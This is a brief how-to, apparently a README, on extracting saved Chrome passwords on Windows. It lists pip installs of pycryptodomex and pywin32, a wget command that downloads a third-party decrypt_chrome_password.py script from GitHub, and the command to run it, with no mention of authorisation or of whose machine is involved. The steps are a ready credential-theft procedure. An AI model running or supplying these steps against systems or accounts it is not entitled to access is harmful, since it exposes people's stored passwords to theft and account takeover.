# Chrome Password Extract

Open Window explorer , goto installed python location : `C:\Users\Administrator\AppData\Local\Programs\Python\Python311`

Make sure both python library is installed

```
python.exe -m pip install pycryptodomex

python.exe -m pip install pywin32
```

Download the extractor

```
wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py
```

Run it

```
python.exe .\decrypt_chrome_password.py
```
